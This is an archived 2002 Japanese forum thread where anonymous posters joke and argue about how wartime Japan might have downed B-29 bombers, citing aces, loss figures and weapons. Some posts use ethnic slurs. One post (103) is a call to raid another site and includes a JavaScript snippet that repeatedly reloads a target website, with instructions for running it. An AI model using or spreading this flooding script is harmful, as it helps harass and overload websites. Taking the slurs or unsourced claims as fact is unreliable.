2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

B29を、旧日本軍の戦力で打ち落とそう

1 :名無し三等兵:02/06/17 22:36
無理ですかね?


2 :名無し三等兵:02/06/17 22:38
チョンの予感

3 :名無し三等兵:02/06/17 22:38
震天制空隊

4 :名無し三等兵:02/06/17 22:38
2ゲトー

5 :名無し三等兵:02/06/17 22:38
高度1,000mを着陸速度で飛んできてくれれば可能です。

6 :名無し三等兵:02/06/17 22:38
B29が日本軍からどれだけ撃墜されたか知ってます?

7 :名無し三等兵:02/06/17 22:40
竹槍の予感・・・・

8 :_:02/06/17 22:41
高射砲を富士山の頂上に持っていって何機か撃ち落としたらしいよ

9 :名無し三等兵:02/06/17 22:41
ゼロ戦を赤く塗って(略)

10 :名無し三等兵:02/06/17 22:42
高尾山から竹槍で突き刺したらしい・・・・・


11 :名無し三等兵:02/06/17 22:42
コヴァチョンすれおおいな

12 :名無し三等兵:02/06/17 22:43
真実角度設定がもっと上手くいっていれば、
日本へ飛来したB29は全て撃墜できていたはず。



13 :名無し三等兵:02/06/17 22:43
>>11
チョンは軍事板に常駐してますから

14 :名無し三等兵:02/06/17 22:43
台風で墜落もあったらしい。

15 :名無し三等兵:02/06/17 22:46
第二次大戦当時、
日本は真実角度確定機精度が他の各国より明らかに低かった。

だからB29に苦戦した。

16 :名無し三等兵:02/06/17 22:47
大和の主砲で三機一気にふっとばしたらしい。

17 :名無し三等兵:02/06/17 22:48
本土に来るB29も撃ち落せないのによく戦う気になったなあ・・・。
なんてしみじみ思う今日この頃。

18 :名無し三等兵:02/06/17 22:50
>16
大和の真実角度精度だと、
6機は堅い

19 :_:02/06/17 22:55
山和の主砲はでかすぎて精度が甘かったらしいぞ

20 :名無し三等兵:02/06/17 22:55
準鷹防空隊の戦果を超えるB29キラーはいない

21 :名無し三等兵:02/06/17 22:57
コヴァスレ

終了

22 :名無し三等兵:02/06/17 22:58
>>20
ワラタ。あのスレの1もあんな風にスレが進行するなんて思わなかったろうなぁ

23 :名無し三等兵:02/06/18 00:02
3号爆弾

24 :15万トン千ヵん:02/06/18 00:06
雷電、いや震電ならば相当やれたろうね。秋水もあるし。

25 :15万トン千ヵん:02/06/18 00:14
http://kaba.2ch.net/test/read.cgi/army/1024323299/l50

26 :名無し三等兵:02/06/18 00:19
あれ、竹槍で落とせるんじゃナイの?

27 :名無し三等兵:02/06/18 00:20
>19
砲はともかく、真実角度精度は良かったから命中率良さそう

28 :名無し三等兵:02/06/18 00:21
風船爆弾で

29 :                :02/06/18 00:24
ドイツから風砲輸入して
完成させませう

30 :名無し三等兵:02/06/18 00:26
落下傘爆弾という物があったらしい
詳細キボンヌ

31 :名無し三等兵:02/06/18 00:28
ヴァルタータービンの潜水艦で運ばねば
逆さ福ティーガーと一緒に
ついでにムカデ砲やA4も

32 :名無し三等兵:02/06/18 00:55
重力が無ければ皆で石を投げて落とせます
そしたらまず爆弾が落ちて来れないか(藁

33 :名無し三等兵:02/06/18 00:58
排気タービンの開発が手遅れなら、戦闘機で上がる所まで上がって
高度を稼ぐ。そして、酸素ボンベを起動(5分位あればいいのでは)。
そうすれば、高高度に行ける。しかし、一度きりの一撃離脱戦法〜
これどうですか?あっ、落下式の噴式ロケットの方が良いかな?


34 :名無し三等兵:02/06/18 01:05
やはりA4(V2)を日本独自の有人誘導にして(以下略

35 :名無し三等兵:02/06/18 01:07
>>33
それ、酸素過給として実験されたけど、ダメだったよ

36 :名無し三等兵:02/06/18 01:08
B29って無茶苦茶落とされてるんですが・・・・・

37 :名無し三等兵:02/06/18 01:11
300〜400機で?


38 :名無し三等兵:02/06/18 01:11
・特設哨戒艇全数に積める程度のレーダー
・受信のみでもある程度は確実に聞こえる機載無線電話
・戦闘管制システム(陸海共同)
があれば、かなり違うとは思いますが、所詮はないものねだり。

15cm高射砲大量配備(1年前倒し)の方が余程現実的に思えてしまうのが悲しい。

39 :名無し三等兵:02/06/18 01:12
戦闘機に竹やりまふらーでどうだっ!!

40 :名無し三等兵:02/06/18 01:20
樫出大尉の26機撃墜をはじめ、
20機前後のB29を撃墜したパイロットは
何人もいますよ。


41 :名無し三等兵:02/06/18 01:21
>>34
桜花を対空用に使ったほうが現実的か

42 :名無し三等兵:02/06/18 01:22
日本でB29撃墜数No.1の戦闘機って何だったの?

43 :名無し三等兵:02/06/18 01:22
二次元運動する艦艇にも命中しなかったものを三次元運動する航空機に
ぶつけることは・・・

44 :名無し三等兵:02/06/18 01:25
>>40
16機でしょ

45 :名無し三等兵:02/06/18 01:26
飛燕だと思う
体当たりを除いても
高高度までまともに上がれたのはあれだけ

46 :名無し三等兵:02/06/18 01:27
256発打ち込めば落とせます。

47 :名無し三等兵:02/06/18 01:38
撃墜数は分からないが、B29撃墜率が高そうな順に並べると
紫電改
五式戦
四式戦 疾風
二式戦 しょうき(漢字が出ない・・)
三式戦
かな?

48 :名無し三等兵:02/06/18 01:41
26機撃墜の樫出大尉機は「屠龍」です。
37ミリ機関砲は装填数15発だったそうです。

49 :名無し三等兵:02/06/18 01:41
>>40
空戦で失われたB29は130機らしいが、その数人程度のパイロットの戦果なのか?




50 :気球太郎:02/06/18 01:44
阻塞気球による戦果。

51 :>47:02/06/18 01:48
出鱈目を言うな。紫電改が最上位で三式が最下位かよ・・・。
丸っきり事実に反した思い込みなレス

52 :名無し三等兵:02/06/18 01:49
>>51
でも「率」と書いてあるからな・・・。
どういう意味だ?


53 :名無し三等兵:02/06/18 01:53
竹槍だタングステン超硬コーティング竹槍を
使えばB29の100機や200機など物の数ではない!

54 :42:02/06/18 01:54
B29って夜間空襲が多かったような・・・
そうすると迎撃側としては航法も乗れる複座機の活躍のチャンスが多かったのでは?
などと言ってみる。

55 :名無し三等兵:02/06/18 01:54
レール癌

56 :名無し三等兵:02/06/18 01:56
田中光二の仮想戦記によれば
パトリオットで撃ち落せるそうです
コロニーぶつけても落ちるはず

57 :名無し三等兵:02/06/18 01:57
>52
キルレシオみたいなものでは?

58 :名無し三等兵:02/06/18 01:58
>>57
んなもの分かるんですかね?


59 :名無し三等兵:02/06/18 01:59
電磁砲を持ってすれば・・・・

60 :52:02/06/18 01:59
分からないってことはなさそう。

ただ、相手がB29だと海に出てから落ちるものも多いから統計とりにくそう

61 :52じゃなくて57:02/06/18 02:00
でした

62 :名無し三等兵:02/06/18 02:01
>>1
デビット・カッパーフィールドをタイムスリップ
させて編隊ごと消してもらう。

63 :名無し三等兵:02/06/18 02:04
>>49

「何人も」というのはハッタリでした。
エースとしてはこんな感じです。

樫出勇大尉  26機撃墜
木村定光准尉 22機撃墜
伊藤藤太郎中尉 17機撃墜
小林照彦少佐 10機撃墜
吉田 好雄大尉 7機撃墜


64 :名無し三等兵:02/06/18 02:06
初期は昼間高高度からの戦略目標を精密爆撃してたけど、偏西風やら地表気流で成果が上がらなかった
低高度の夜間焼夷弾絨毯爆撃は、後期カーチス・ルメイが着任してからなんだな
それ以前は英本土の第8空軍でエイカーの下にいた
英空軍の指揮下で作戦する夜間焼夷弾絨毯爆撃を嫌って、損害の多い昼間爆撃に固執した
で、エイカーが解任されて日本攻略に来た途端、夜間焼夷弾絨毯爆撃を採った
低高度だから損害も多かったけど、主要都市をほぼ壊滅
ただし、それが軍部・国民の継戦意思をどれだけ削いだかは疑問
日本の戦力・生産力・経済力を本当に弱体化したのは、機雷散布による港湾封鎖と潜水艦の通商破壊、さらに工場疎開による生産遅延だったと言われ

65 :名無し三等兵:02/06/18 02:07
8000mの竹やりを作る

66 :名無し三等兵:02/06/18 02:09
とりあえず、俺の逸物を押っ立てれば阻塞気球の替わりぐらいにはなる。

67 :名無し三等兵:02/06/18 02:10
非常識講師・間宮善三郎を量産する

68 :名無し三等兵:02/06/18 02:11
東条閣下に竹槍持たして撃ち落してもらう

69 :名無し三等兵:02/06/18 02:11
>>66
B公のハミルトン・スタンダード製4翔プロペラが4発分の計16翔の刺激がたまらんぞい!
めめず16翔

70 :気球太郎:02/06/18 02:12
66の攻撃精神を尊重したい。
66を阻塞気球に吊下し、その逸物(自称)を以って空中槍ぶすまとする。

71 :名無し三等兵:02/06/18 02:17
>>64
ルメイの言い草だった「都市にある町工場」破壊の影響はどうだったのかな?
日本の工場疎開は遅れていたし、影響あったように思うが如何。
昭和20年6月頃の政府調査では、「民心ニ相当ノ動揺アリ」なんて報告もあったようで。

B29の損害もアメリカから見れば多かったろうが、せいぜい400機以下だしなあ。
地上の悲惨さと比べると・・・。
戦争だからしょうがないのだろうが。

72 :名無し三等兵:02/06/18 02:18
>>70
1本じゃ足りねえよ・・・・・


73 :名無し三等兵:02/06/18 02:21
蚊取り線香を大量に炊く

74 :気球太郎:02/06/18 02:35
>>72
実に的確な指摘である。
72には我が皇軍の率先垂範精神に則り、66と並び吊下して2双の英槍を
為さしめることとする。

小官は、66ならび72の勇敢なる壮途を全力を以って支援する為、
あえて地上に留まり気球の上昇下降操作にその全霊を尽くすものである。

75 :名無し三等兵:02/06/18 02:39
女子挺身隊の女学生諸君に心を込めて磨き上げてもらおう
ところで艦載の零戦などは整備員がせっせと磨いてたためツヤ有りが正解という説がある
制式飴色と並ぶ都市伝説との噂も

76 :名無し三等兵:02/06/18 02:44
阻塞気球に乗ってB公が来たら飛び移って外販引っぺがしたりエンジンもぎ取ったり
って、トワイライト・ソーンのグレムリンじゃん

77 :72:02/06/18 02:45
>>74
Σ(゚Д゚;エーッ!! ソリャアンマリダヨ!マジデスカ!?



78 :名無し三等兵:02/06/18 02:51
しっかり勃起してないとB−29の主翼に断ち切られるぞ!
オカズも装備じゃ

79 :72:02/06/18 02:58
B公ゴトキニマケナイゾ!!

オカズハナンデスカ!? ハァハァ ゚∀゚)〆


80 :名無し三等兵:02/06/18 03:04
鳥を訓練してバードストライク

81 :名無し三等兵:02/06/18 03:04
B−29の機首が尿道口に入って…ついお漏らししちゃったんです

82 :名無し三等兵:02/06/18 03:07
>>80
一票を投ずる。

83 :名無し三等兵:02/06/18 03:08
巨マンのおなごを気球にぶら下げておけば勝手に入って来る
手始めに和田アキ…(BLAM!

84 :名無し三等兵:02/06/18 03:09
>>79
ティガー戦車写真集inノルマンディー
波打ち際でのティガー戦車の大胆なポーズが納められた
何時撮ったかも分からない貴重な写真集だ

85 :名無し三等兵:02/06/18 03:12
裏返しになったティーガーIだとイッてしまいそうだから
航空爆弾直撃で屋根が飛んだ3突と
アフリカの首無し運転手付き4号でガマン

86 :名無し三等兵:02/06/18 03:15
>>80
高度1万まで上がれる鳥なぞおらん!
酸素背負わせるべし

87 :名無し三等兵:02/06/18 03:19
>>84>>85
せめて原節子くらい言えよ(w
これだから軍ヲタは・・・ブツブツ・・・(PAM!


88 :名無し三等兵:02/06/18 03:39
北チョソの10倍は被害与えているからまあ良しとしましょう

89 :名無し三等兵:02/06/18 03:39
だ〜って戦時中のヲナペットなんて知らんもん
あ!モンローじゃイッちゃってダメか

90 :名無し三等兵:02/06/18 03:58
スレタイトルが
>B29を、旧日本軍の戦力で打ち落とそう
なのだからして
精神注入棒が最適なのであろうか

91 :名無し三等兵:02/06/18 04:03
航空機を撃ち落とすのは不可能ではないが
打ち落とすのは技術的にちょっと勘弁して欲しい

92 :Mr.ダイオキシン ◆kmNaURZ6 :02/06/18 21:18
まじめにいきましょう。
乙巡”最上”型を甲巡にした時にあまった15.5センチ砲を、全部高角砲にして
帝都周辺に配備し、三式弾を装てんする。
・・・あとは、まともな高射装置があれば。

93 :15万トン千ヵん:02/06/19 00:14
爆撃機迎撃なら雷電で事足りる。震電・秋水あればB29かなりやばいだろうな。

94 :名無し三等兵:02/06/19 00:24
>>71
>>B29の損害もアメリカから見れば多かったろうが、せいぜい400機以下だしなあ
それがマジなら敗戦までのわずか1ヶ月間で300機近いB-17を落したMe262はやっぱり凄いのかも

95 :名無し三等兵:02/06/19 00:25
桜花を対航空機用に使うのは?

96 :名無し三等兵:02/06/19 00:28
>>95
正気ですか?


97 :名無し三等兵:02/06/19 00:32
久我山の15センチ高射砲なら…と言ってみる試験。

98 :名無し三等兵:02/06/19 00:44
そもそも紫電改でB-29を撃墜した事実さえ聞いたことがないなぁ。
そういう話しは事実として存在するの?

99 :名無し三等兵:02/06/19 00:51
このスレタイトル見たとき、一瞬
「B29を、旧日本軍の軍刀で打ち落とそう」と読めた。

・・・漏れの目、悪すぎ。

100 :名無し三等兵:02/06/19 00:55
江田島平八ならば文字通り打ち落とせます。

101 :名無し三等兵:02/06/19 00:59
雷電は高高度要撃の局地戦じゃなかったっけ? 何機戦果上げたか知らないけど・・
厨でスマンコ。

102 :名無し三等兵:02/06/19 01:10
>>92 2ヶ月前に書いたエヴァネタ

日向「エリア侵入と同時に20ミリ機銃と12.7ミリ機銃で100%狙い撃ち。
    零戦による近接戦闘も危険すぎます。特攻、火砲、竹槍などの
    なまはんかな攻撃では、泣きを見るだけですね、こりゃ」
葛城「攻守ともにほぼパーペキ。まさに空中要塞ね。B-29が搭載している爆弾は?」
日向「最大搭載量9トン、新型爆弾の搭載も噂されます
    敵はここ帝都東京へ直接爆撃を仕掛けるつもりです」
葛城「しゃらくさい。で、到達予想時刻は?」
日向「明日午後22時30分54秒。その時刻には22の防衛線のすべてを突破して
    東京上空へ到達するものと思われます」
葛城「状況はかんばしくないわね」
日向「白旗でもあげますか」
葛城「その前にチョッチやってみたいことがあるの」

冬月「目標のレンジ外、長々距離からの直接射撃かね」
葛城「そうです。大和主砲の三式弾による長距離射撃しか方法はありません」
冬月「MAGIはどう言ってる」
麻耶「スーパーコンピューターMAGIの回答は賛成が0、反対が3
   東京市街地に着弾した三式弾の被害の方が甚大と回答しています」
碇 「・・・・・冬月、後を頼む」

103 :名無し三等兵:02/06/19 01:11
厨房の巣窟発見!ただいま戦力不足の為救援願います。
大本営http://live.2ch.net/test/read.cgi/festival/1023970263/
<input type="text" name="ival" value="1">
<input type="button" value="田代砲改砲撃開始!" onClick="c();">
<script language="JavaScript">

var tid;
var ta="http://www.hanashinotane-geinou.com/";
w=window.open(ta,'san','WIDTH=500,height=400');
function c(){
w.location=ta;
tid=setTimeout("c()",ival.value);
}
</script>
これをメモ帳にコピペし 拡張子をhtmlに変換。 そして起動して下さい。




104 :名無し三等兵:02/06/19 01:12
援助してやるか・・・

105 :名無し三等兵:02/06/19 01:14
B29には、ぬのでできた部分があると聞いたが・・・・
そこをねらえば・・・・

106 :名無し三等兵:02/06/19 01:24
B29は運用損失が被撃墜数より多かったってホント?

107 :名無し三等兵:02/06/19 01:28
B-29は鼻にガムテープを貼るといやがる

108 :名無し三等兵:02/06/19 01:33
>>106
数字的には今すぐどうとは言えないがかなりの難物で
運用マン・アワーも膨大なものだったらしい
初期の奴は火災起こしたり離陸に失敗したり

109 :名無し三等兵:02/06/19 01:36
まぁ、富嶽を造らなかった日本は畜米より、ある意味正しかったのか・・・

110 :名無し三等兵:02/06/19 01:36
http://www.sun-inet.or.jp/~ja2tko/jap/ok_b29.museum.html
これだと485機撃墜と書いてあるよ。

111 :三等ゲーマー:02/06/19 01:38
>>71
既に潜水艦と機雷封鎖で稼働率が落ちていた設備を破壊しただけ。
ようするにオーバーキル。

112 :名無し三等兵:02/06/19 01:41
B29の一回の爆撃においての被撃墜率は

大東亜戦争でのイルボソによる撃墜率>朝鮮戦争での北韓による撃墜率

とのことですが、具体的にどんなもんなんでしょう?

113 :名無し三等兵:02/06/19 01:41
実はP-3Cとサイズ的には変わらない事実

114 :マルサッカ:02/06/19 01:42
どうせなら硫黄島を死守しよう。
そうすればもう少しB29の損害増やせるぜ。

115 :名無し三等兵:02/06/19 01:44
補給線は…いやいや細かいことか

116 :名無し三等兵:02/06/19 01:46
エンジンに問題があった(最後まで解決されず)。
平時なら採用されたか疑問だ。

117 :名無し三等兵:02/06/19 01:59
>>111
機雷封鎖は昭和20年3月からだよ。


118 :名無し三等兵:02/06/19 02:16
>>112
B29の延出撃数3万3千機、このうち戦闘中損失が450機(空戦・対空砲火他)、
損失率1.38%という数字がありますね(渡辺洋二「本土防空戦」)。
別のデータだと1944年11月以降マリアナからの出撃、延2万4千機、うち損失318機
(空戦によるもの130機)、損失率1.33%。
日本側の迎撃戦闘は、1945年6月頃でほぼ終息したそうです。

朝鮮戦争は不明ですが、記憶では日本上空の戦いより少ない損失ではなかったかと。
状況も違いますけどね。


119 :名無し三等兵:02/06/19 02:25
で、帝都防空にMiG15またはフッケバインがあればというネタになる

120 :名無し三等兵:02/06/19 02:52
B29に戦闘機で特攻することがあったと聞いたけど。
紫電改や五式戦がB29を普通に撃墜出来たのなら特攻の必要なかったと
思うのだけど。。。?

121 :名無し三等兵:02/06/19 02:57
>>120
それは高空で来襲した際の話だね。
武装を外した三式戦が、震天制空隊として空対空特攻をしている。
厳密に言えば、対艦特攻とは違うけど。

ついでに五式戦なんかも、普通に撃墜できたわけではないのだけど。

122 :名無し三等兵:02/06/19 03:02
>>120
高度一万のような高空まで上がるのに時間が掛かる。
しかも迎撃に間に合ったとしても一撃程度が限界。
じゃあ比較的高々度性能のよかった三式戦辺りを燃料最小、機銃もおろして軽くし体当たりさせれば高撃墜率が見込めるのでは?
と、当時の人は考えた。
ちなみに特攻といっても艦艇に対して行うのとは違い、僅かながら生還の可能性もあった。

123 :名無し三等兵:02/06/19 03:40
生きて帰った例が実際にありますね。

しかし、高度9千やら1万やらから生身の人間が生きて帰れるもんなんですかね?
与圧服着ていたら大丈夫なものなのかな?

124 :Mr.ダイオキシン ◆kmNaURZ6 :02/06/19 20:58
電熱服と酸素マスクでなんとかなる。
・・・まてよ、震天隊って電熱服着ていたかな?

125 :名無し三等兵:02/06/20 01:36
>123
大和魂です。

126 :名無し三等兵:02/06/20 18:11
>>98 紫電改はF6F、F4Uは敵じゃなかったと、紫電改の搭乗員は言ってるよ。
   B29なら雷電の方が有効だろうね。

127 :名無し因果応報 ◆1vy8yE0w :02/06/20 18:37
空対空特攻の場合は色々とやり方あるからね。翼でぶつかっていくようにすれば、時には生還
できるし……とはいえ、無茶苦茶だよなぁ。はぁ。

>94
Me262のケースと日本の状況を一緒にしてはいかんぞよ。B-17も強力だが、B-29は化け物だ。
まあ、Me262が優秀だったというのは全く否定しないけどね。

128 :_:02/06/20 18:56
B29てなんであんなにギンギラギンなんだ

129 :名無し三等兵:02/06/20 19:18
日本軍の噴進弾で自動追尾型のやつがあったらしがいが、
その性能の詳細なソースを!

130 :名無し三等兵:02/06/20 20:38
ウチの教授(当時田舎在住)が言うことには、

B29(・∀・)カコイイ!!

って思ってるうちになんか戦争が終わってしまったとか。
戦争らしい体験は特に無かったらしいですが、B29の編隊はどのように見えたんでしょうかねぇ。

>129
奮龍4型CG
http://www2.inforyoma.or.jp/~mind/game/closegraphic/furyu.jpg

奮龍2型・性能諸元
全長:2.4m
直径:0.3m
翼幅:0.96m
誘導方式:指令
推進方式:固体
射程:5000m

奮龍4型・性能諸元
全長:4m
直径:0.60m
翼幅:1.6m
発射重量:1900s
誘導方式:ビームライディング
推進方式:液体
射程:25000m

http://isweb31.infoseek.co.jp/art/ho-to-/hunryu.html

ヴァッサーファルに比べるべくもない…ま、あたりまえか(w


131 :Mr.ダイオキシン ◆kmNaURZ6 :02/06/20 21:42
>>128
重量を軽くするために、無塗装なんです。

132 :名無し三等兵:02/06/21 21:27
>>130
SAMの走りですな
大和に搭載したら…萌え〜

133 :ラバウル航空隊:02/06/21 21:44
ソロモン群島ガダルカナルへ今日も空襲大編隊、翼の20ミリ雄叫び上げりゃ
墜ちるグラマン、ヒコルスキー

134 :名無し三等兵:02/06/21 21:58
おいワールドアドバンスド大戦略!
B-29がどうして日本の歩兵に撃墜されるんだ!?
ヴォケが!

135 :名無し三等兵:02/06/21 22:03
>134
特殊能力:大和魂

136 :名無し三等兵:02/06/21 22:08
>>134
案ずるな。
メガドラの元祖アドバンスドじゃ弾薬補給車が反撃でB17を落とすぜ。

137 :名無し三等兵:02/06/22 01:36
>>134
竹槍オソルベシ

138 :Mr.ダイオキシン ◆kmNaURZ6 :02/06/22 01:55
>>134
特殊吸着爆弾を使用するのでは?
あの義烈空挺隊で使ったヤツ。
飛行場のB-29なら大丈夫

139 :名無し三等兵:02/06/23 20:33
B-29の飛来33000機に対して日本の戦闘機が迎撃・接敵したのが11000機。しかも銃手は
1000機以上の撃墜破を報告っていう数字が残っているそうだが、どうよ?


140 :名無し三等兵:02/06/23 20:39
夜間爆撃で3千m以下の低空で来れたのも、尾部銃座以外の武装を降ろして来れたのも、
日本の夜間防空が屁たれだ見越したからで、実際そのとうりだったから情けないね。
これは相手が化け物みたいなもんだったとか以前の問題だなぁ。


141 :名無し三等兵:02/06/23 20:42
夜間だったらランカスターにも梃子摺りそうだ

142 :名無し三等兵:02/06/23 20:42
>>139
銃手の報告ってのは信憑性に欠けるとは思うがな。

143 :打通さん:02/06/23 20:57
沖縄戦でみせた神風特攻隊の大量出撃は、空爆と封鎖だけで日本を降伏に追い
込むことは不可能だと米側に認識させ、それがポツダム宣言発表につながった
のだとおれさまは考える。ベルリン陥落間際のドイツのようにアメリカがほっと
いても潰れそうなのなら、わざわざ降伏勧告なぞアメリカ側からする必要は無い。

144 :名無し三等兵:02/06/23 21:25
うちの爺さんが、皇居で高射砲撃ってたんよ。
2回しか会ったこと無いうちに他界しちゃって、両親からの又聞きなんだが、
高射部隊にとって帝都に来襲するB29は、高高度侵入は当然お手上げ。
低高度も豊洲の方を突破されたら、おしまいと言った雰囲気だったらしい。
半分やけっぱちみたいな感じで、砲をぶっぱなしてたみたい。
なにぶん又聞きなんで・・・。

145 :長島飛行機:02/06/23 21:42
水中モーター装備…(ボソッと)

146 :名無し三等兵:02/06/23 21:52
日本軍の戦果確認が如何にデタラメかという典型的な例としては台湾沖航空戦がある
実際の戦果は敵巡洋艦2隻大破にすぎなかったが、報告では轟撃沈ー空母11隻、戦艦2隻、
撃破ー空母8隻、戦艦2隻、その他となって、大本営までこの戦果を信じてしまい
街では提灯行列まで繰り出し、捷一号作戦(比島作戦)の発動実施を早めるという大チョンボ

147 :名無し三等兵:02/06/23 22:03
大本営発表の戦果と実数  正規空母護衛空母合計ー97隻(実際は正規5隻、護衛5隻、
 戦艦36隻(実際は真珠湾の7隻だけ)重巡、軽巡219隻(実際は重巡7隻、軽巡3隻)
 駆逐艦、護衛艦149隻(実際は駆逐艦52隻、護衛艦5隻)潜水艦305隻(実際、16隻)


148 :名無し三等兵:02/06/23 22:21
147の戦艦数は真珠湾5隻、英東洋艦隊2隻の計7隻の間違い

149 :名無し三等兵:02/06/23 22:35
>72
「弾」
ガ有るんじゃない?  例え一本でも
5000ミリくらいの。
高高度からはるかサイパンに向けて砲撃するのがよろしかろうと空想するが?


150 :名無し三等兵:02/06/23 22:35
戦いの形態が第三者の介在しない洋上で作戦する特殊性を差し引いても
「台湾沖航空戦」の幻の戦果が後々の作戦を早まらせた事は確かだ。
海軍こそが帝国軍隊の死期を早めたようなもの。

何?ンなこと後智恵だって?
ああ、後智恵だよ。

151 :149:02/06/25 23:49
弾は二発ね

152 :名無し三等兵:02/06/26 00:02
連山を迎撃機に改造する

153 :名無し三等兵:02/06/26 00:16
>潜水艦305隻(実際、16隻)

日本軍が撃沈した潜水艦は52隻の筈だが・・・

154 :名無し三等兵:02/06/26 00:24
妄想では皇軍大勝利なんだがね・・・

155 :名無し三等兵:02/07/15 19:10 ID:???
海軍 長10センチ砲 これ最大射高12000mぐらいだったかな?

陸軍15センチ高射砲は12000mまで届いたが2門しか完成しなかった

156 :名無し三等兵:02/07/15 20:13 ID:9sikH2Gx
とにかくB-29は整備面が、当のアメリカ人でも難しかったらしい。
1944年の中国基地から発進した、北九州・八幡をねらった
B-29の本土初空襲の話では離陸時に一機が墜落し、他の機も
山口・小月基地からきた追撃機・日本軍高射砲を振切ったものの
やはり帰還途中、故障で数機墜落したと聞いたことがある。
攻撃に対する耐久性はあるがどうもメンテナンス面で問題がある機
だったようだ。
ちなみに八八式7.5センチ高射砲を飛竜の先端に装備し名古屋上空で
B-29にぶっぱなしたが失敗したという有名な話、どなたかご存知ない
ですか?

157 :名無し因果応報 ◆1vy8yE0w :02/07/15 21:52 ID:???
飛龍の改造機? 世界中、探してもその手の機体で成功した例は聞かないな。

>155
最大射高は=有効射高じゃないからねぇ。高々度侵入にはどれだけ対処できたものやら

日本の高射砲は根本的に数が足り無すぎる。日本の高射砲製造能力は最先端とは言えな
いまでも、海軍が頑張っていたので質的には悲惨なほど劣っていたというわけではない。
が、数が作れない。おかげで空が守れない。空が守れないから工場がやられると。まあ、
基礎的な部分で負けていた証拠ですな。

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)